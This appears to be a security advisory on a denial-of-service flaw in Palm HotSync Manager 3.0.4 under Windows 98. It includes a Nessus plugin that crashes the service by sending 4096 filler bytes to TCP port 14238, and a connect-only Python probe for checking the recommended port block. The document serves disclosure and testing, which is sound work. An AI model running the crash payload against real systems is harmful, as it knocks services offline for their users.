Palm HotSync Manager is vulnerable to Denial of Service attack
----------------------------------------------------------------------------
SUMMARY
HotSync Manager provides network synchronization between the Palm Desktop
and a remote Palm PDA that is connected via the Internet. This feature is
used to back up the information from the Palm PDA to a secure location.
However, using HotSync Manager over the network exposes it to an attack
in which anyone with a network connection to the station running HotSync
Manager can crash the application and possibly execute arbitrary code.
DETAILS
Vulnerable systems:
HotSync Manager 3.0.4 under Windows 98
Non vulnerable systems:
HotSync Manager 3.0.4 under Windows 2000
Exploit:
By connecting to the HotSync Manager's TCP listening port (TCP port
14238), and sending a large amount of data followed by a newline, it is
possible to crash the HotSync Manager.
The following Nessus Plugin can be used to test this:
#
# This script was written by Noam Rathaus <[EMAIL PROTECTED]>
#
# See the Nessus Scripts License for details
#
#
if(description)
{
  name["english"] = "HotSync Manager Denial of Service attack";
  script_name(english:name["english"]);

  desc["english"] = "It is possible to cause HotSync Manager to crash by sending a few bytes
of garbage into its listening port TCP 14238.

Solution: Block those ports from outside communication

Risk factor : Low";
  script_description(english:desc["english"]);

  summary["english"] = "HotSync Manager Denial of Service attack";
  script_summary(english:summary["english"]);

  script_category(ACT_DENIAL);
  script_copyright(english:"This script is Copyright (C) 1999 SecuriTeam");

  family["english"] = "Windows";
  script_family(english:family["english"]);
  exit(0);
}

#
# The script code starts here
#
if (get_port_state(14238))
{
  sock14238 = open_sock_tcp(14238);
  if (sock14238)
  {
    # Send 4096 filler bytes followed by a newline, then disconnect
    data_raw = crap(4096) + string("\n");
    send(socket:sock14238, data:data_raw);
    close(sock14238);

    # Give the service time to fail, then try to reconnect
    sleep(5);
    sock14238_sec = open_sock_tcp(14238);
    if (sock14238_sec)
    {
      # Still listening: the port is reachable but the service survived
      security_warning(port:14238, data:"HotSync Manager port is open.");
      close(sock14238_sec);
    }
    else
    {
      # No longer listening: the service crashed
      security_hole(port:14238);
    }
  }
}
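The plugin above is an ACT_DENIAL test and takes the service down on a vulnerable host. To confirm only that the recommended port block is in place, a connect-only probe is enough. The following Python code is an added example, not part of the original advisory or of Nessus; the function names and the open/closed/filtered classification are this example's own.

```python
import socket
import sys

HOTSYNC_PORT = 14238  # TCP port named in the advisory


def probe_port(host, port=HOTSYNC_PORT, timeout=3.0):
    """Classify a TCP port as 'open', 'closed' or 'filtered'.

    Only the TCP handshake is performed and no payload is sent.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:
        return "closed"        # RST received: nothing is listening
    except socket.gaierror:
        raise                  # bad host name is a caller error, not a port state
    except OSError:
        return "filtered"      # timeout or ICMP unreachable: traffic is dropped


def audit(hosts, port=HOTSYNC_PORT, timeout=3.0):
    """Probe each host and return a {host: state} mapping."""
    return {host: probe_port(host, port, timeout) for host in hosts}


def exposed(results):
    """Hosts whose port still accepts connections from this vantage point."""
    return sorted(h for h, state in results.items() if state == "open")


if __name__ == "__main__":
    # Run from outside the perimeter; host addresses are given as arguments.
    results = audit(sys.argv[1:])
    for host, state in sorted(results.items()):
        print(f"{host}:{HOTSYNC_PORT} {state}")
    sys.exit(1 if exposed(results) else 0)
```

A result of "open" from an external vantage point means the block is missing; "filtered" is the expected state behind a firewall that drops the traffic.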
ADDITIONAL INFORMATION
3Com's Palm computing team is aware of the problem and will fix this issue
in the next release of the HotSync Manager.